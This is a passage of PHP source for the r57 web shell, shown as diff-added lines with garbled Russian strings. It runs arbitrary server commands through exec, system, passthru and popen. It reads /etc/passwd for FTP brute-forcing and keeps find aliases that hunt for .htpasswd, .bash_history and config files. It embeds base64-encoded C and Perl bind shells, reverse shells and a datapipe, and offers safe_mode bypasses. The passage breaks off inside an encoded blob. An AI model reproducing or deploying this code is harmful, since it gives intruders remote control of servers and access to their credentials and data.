أ«أ¨أ±أ²أ¨أ­أ£أ  أ¤أ¨أ°أ¥أھأ²أ®أ°أ¨أ© أ± أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ­أ¨أ¥أ¬ imap_list', +'ru_text114'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode, أ¯أ°أ®أ±أ¬أ®أ²أ° أ±أ®أ¤أ¥أ°أ¦أ¨أ¬أ®أ£أ® أ´أ أ©أ«أ  أ± أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ­أ¨أ¥أ¬ imap_body', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', 
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files
via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text777'=>'bypass safemode with copy()', +'eng_text888'=>'File name', +'eng_text7777'=>'bypass safemode with curl()', +'eng_text8888'=>'File name', +'eng_text999'=>'bypass safemode with imap()', +'eng_text9999'=>'File name', +'eng_text1010'=>'bypass safemode with id()', +'eng_text101010'=>'', +); +/* +أ€أ«أ¨أ أ±أ» أھأ®أ¬أ أ­أ¤ +أڈأ®أ§أ¢أ®أ«أ؟أ¾أ² أ¨أ§أ،أ¥أ¦أ أ²أ¼ أ¬أ­أ®أ£أ®أھأ°أ أ²أ­أ®أ£أ® أ­أ أ،أ®أ°أ  أ®أ¤أ­أ¨أµ أ¨ أ²أ¥أµ-أ¦أ¥ أھأ®أ¬أ أ­أ¤. 
( أ‘أ¤أ¥أ«أ أ­أ® أ،أ«أ أ£أ®أ¤أ أ°أ؟ أ¬أ®أ¥أ© أ¯أ°أ¨أ°أ®أ¤أ­أ®أ© أ«أ¥أ­أ¨ ) +أ‚أ» أ¬أ®أ¦أ¥أ²أ¥ أ±أ أ¬أ¨ أ¤أ®أ،أ أ¢أ«أ؟أ²أ¼ أ¨أ«أ¨ أ¨أ§أ¬أ¥أ­أ؟أ²أ¼ أھأ®أ¬أ أ­أ¤أ». +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>أ¨</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + 
$res = $sr->GetResultFiles();
+ $found = $sr->GetMatchesCount();
+ $titles = $sr->GetTitles();
+ $r = "";
+ if($found > 0)
+ {
+ $r .= "<TABLE width=100%>";
+ foreach($res as $file=>$v)
+ {
+ $r .= "<TR>";
+ $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+ $r .= ($windows)? str_replace("/","\\",$file) : $file;
+ $r .= "</b></font></ TD>";
+ $r .= "</TR>";
+ foreach($v as $a=>$b)
+ {
+ $r .= "<TR>";
+ $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+ $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+ $r .= "</TR>\n";
+ }
+ }
+ $r .= "</TABLE>";
+ echo $r;
+ }
+ else
+ {
+ echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+ }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+ die();
+ }
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+ if(function_exists('exec'))
+ {
+ @exec($cfe,$res);
+ $res = join("\n",$res);
+ }
+ elseif(function_exists('shell_exec'))
+ {
+ $res = @shell_exec($cfe);
+ }
+ elseif(function_exists('system'))
+ {
+ @ob_start();
+ @system($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(function_exists('passthru'))
+ {
+ @ob_start();
+ @passthru($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(@is_resource($f = @popen($cfe,"r")))
+ {
+ $res = "";
+ while(!@feof($f)) { $res .= @fread($f,1024); }
+ @pclose($f);
+ }
+ }
+ return $res;
+}
+function get_users()
+{
+ $users = array();
+ $rows=file('/etc/passwd');
+ if(!$rows) return 0;
+ foreach ($rows as $string)
+ {
+ $user = @explode(":",$string);
+ if(substr($string,0,1)!='#') array_push($users,$user[0]);
+ }
+ return $users;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'أژأ¸أ¨أ،أھأ ! أچأ¥ أ¬أ®أ£أ³ أ§أ أ¯أ¨أ±أ أ²أ¼ أ¢ أ´أ أ©أ« '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'أژأ¸أ¨أ،أھأ ! أچأ¥ أ¬أ®أ£أ³ أ¯أ°أ®أ·أ¨أ²أ أ²أ¼ أ´أ أ©أ« '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ±أ®أ§أ¤أ أ²أ¼ "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ¯أ®أ¤أھأ«أ¾أ·أ¨أ²أ¼أ±أ؟ أھ ftp أ±أ¥أ°أ¢أ¥أ°أ³','أژأ¸أ¨أ،أھأ  أ أ¢أ²أ®أ°أ¨أ§أ أ¶أ¨أ¨ أ­أ  ftp أ±أ¥أ°أ¢أ¥أ°أ¥','أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ¯أ®أ¬أ¥أ­أ؟أ²أ¼ أ¤أ¨أ°أ¥أھأ²أ®أ°أ¨أ¾ أ­أ  ftp أ±أ¥أ°أ¢أ¥أ°أ¥'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ®أ²أ¯أ°أ أ¢أ¨أ²أ¼ أ¯أ¨أ±أ¼أ¬أ®','أڈأ¨أ±أ¼أ¬أ® أ®أ²أ¯أ°أ أ¢أ«أ¥أ­أ®'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font 
color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." 
"; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + 
if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 